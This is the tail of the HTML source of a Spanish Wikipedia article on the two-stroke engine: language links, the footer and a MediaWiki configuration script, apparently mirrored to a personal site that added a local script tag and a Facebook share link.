class="interlanguage-link interwiki-tr"><a href="https://tr.wikipedia.org/wiki/%C4%B0ki_zamanl%C4%B1_motor" title="İki zamanlı motor (turco)" lang="tr" hreflang="tr" class="interlanguage-link-target">Türkçe</a></li><li class="interlanguage-link interwiki-uk"><a href="https://uk.wikipedia.org/wiki/%D0%94%D0%B2%D0%BE%D1%82%D0%B0%D0%BA%D1%82%D0%BD%D0%B8%D0%B9_%D0%B4%D0%B2%D0%B8%D0%B3%D1%83%D0%BD" title="Двотактний двигун (ucraniano)" lang="uk" hreflang="uk" class="interlanguage-link-target">Українська</a></li><li class="interlanguage-link interwiki-vi"><a href="https://vi.wikipedia.org/wiki/%C4%90%E1%BB%99ng_c%C6%A1_hai_th%C3%AC" title="Động cơ hai thì (vietnamita)" lang="vi" hreflang="vi" class="interlanguage-link-target">Tiếng Việt</a></li><li class="interlanguage-link interwiki-zh"><a href="https://zh.wikipedia.org/wiki/%E4%B8%A4%E5%86%B2%E7%A8%8B%E5%BE%AA%E7%8E%AF" title="两冲程循环 (chino)" lang="zh" hreflang="zh" class="interlanguage-link-target">中文</a></li>				</ul>
				<div class="after-portlet after-portlet-lang"><span class="wb-langlinks-edit wb-langlinks-link"><a href="https://www.wikidata.org/wiki/Special:EntityPage/Q152323#sitelinks-wikipedia" title="Editar enlaces interlingüísticos" class="wbc-editpage">Editar enlaces</a></span></div>			</div>
		</div>
				</div>
		</div>
				<div id="footer" role="contentinfo">
						<ul id="footer-info">
								<li id="footer-info-lastmod"> Se editó esta página por última vez el 16 abr 2018 a las 16:45.</li>
								<li id="footer-info-copyright">El texto está disponible bajo la <a rel="license" href="//es.wikipedia.org/wiki/Wikipedia:Texto_de_la_Licencia_Creative_Commons_Atribuci%C3%B3n-CompartirIgual_3.0_Unported">Licencia Creative Commons Atribución Compartir Igual 3.0</a><a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/" style="display:none;"></a>;
pueden aplicarse cláusulas adicionales. Al usar este sitio, usted acepta nuestros <a href="//wikimediafoundation.org/wiki/Terms_of_Use">términos de uso</a> y nuestra <a href="//wikimediafoundation.org/wiki/Privacy_policy">política de privacidad</a>. <br/>Wikipedia&reg; es una marca registrada de la <a href="//www.wikimediafoundation.org/">Fundación Wikimedia, Inc.</a>, una organización sin ánimo de lucro.</li>
							</ul>
						<ul id="footer-places">
								<li id="footer-places-privacy"><a href="https://meta.wikimedia.org/wiki/Privacy_policy/es" class="extiw" title="m:Privacy policy/es">Normativa de privacidad</a></li>
								<li id="footer-places-about"><a href="/wiki/Wikipedia:Acerca_de" title="Wikipedia:Acerca de">Acerca de Wikipedia</a></li>
								<li id="footer-places-disclaimer"><a href="/wiki/Wikipedia:Limitaci%C3%B3n_general_de_responsabilidad" title="Wikipedia:Limitación general de responsabilidad">Limitación de responsabilidad</a></li>
								<li id="footer-places-developers"><a href="https://www.mediawiki.org/wiki/Special:MyLanguage/How_to_contribute">Desarrolladores</a></li>
								<li id="footer-places-cookiestatement"><a href="https://wikimediafoundation.org/wiki/Cookie_statement/es">Declaración de cookies</a></li>
								<li id="footer-places-mobileview"><a href="//es.m.wikipedia.org/w/index.php?title=Motor_de_dos_tiempos&amp;mobileaction=toggle_view_mobile" class="noprint stopMobileRedirectToggle">Versión para móviles</a></li>
							</ul>
										<ul id="footer-icons" class="noprint">
										<li id="footer-copyrightico">
						<a href="https://wikimediafoundation.org/"><img src="/static/images/wikimedia-button.png" srcset="/static/images/wikimedia-button-1.5x.png 1.5x, /static/images/wikimedia-button-2x.png 2x" width="88" height="31" alt="Wikimedia Foundation"/></a>					</li>
										<li id="footer-poweredbyico">
						<a href="//www.mediawiki.org/"><img src="/static/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" srcset="/static/images/poweredby_mediawiki_132x47.png 1.5x, /static/images/poweredby_mediawiki_176x62.png 2x" width="88" height="31"/></a>					</li>
									</ul>
						<div style="clear: both;"></div>
		</div>
		
<script>(window.RLQ=window.RLQ||[]).push(function(){mw.config.set({"wgPageParseReport":{"limitreport":{"cputime":"0.024","walltime":"0.041","ppvisitednodes":{"value":77,"limit":1000000},"ppgeneratednodes":{"value":0,"limit":1500000},"postexpandincludesize":{"value":236,"limit":2097152},"templateargumentsize":{"value":11,"limit":2097152},"expansiondepth":{"value":4,"limit":40},"expensivefunctioncount":{"value":0,"limit":500},"unstrip-depth":{"value":0,"limit":20},"unstrip-size":{"value":0,"limit":5000000},"entityaccesscount":{"value":0,"limit":400},"timingprofile":["100.00%   23.954      1 -total"," 89.00%   21.319      1 Plantilla:Distinguir","  9.81%    2.349      1 Plantilla:Listaref"]},"scribunto":{"limitreport-timeusage":{"value":"0.006","limit":"10.000"},"limitreport-memusage":{"value":582357,"limit":52428800}},"cachereport":{"origin":"mw1344","timestamp":"20180531011820","ttl":1900800,"transientcontent":false}}});mw.config.set({"wgBackendResponseTime":102,"wgHostname":"mw1319"});});</script>
	
<script id="myscript" src="script.js"></script>


<a target="_blank" href="http://www.facebook.com/sharer.php?u=http://superminaless.bitballoon.com/"><img src="mi_imagen.gif" border=0 width=100 height=30 /></a>
</body>
</html>ssss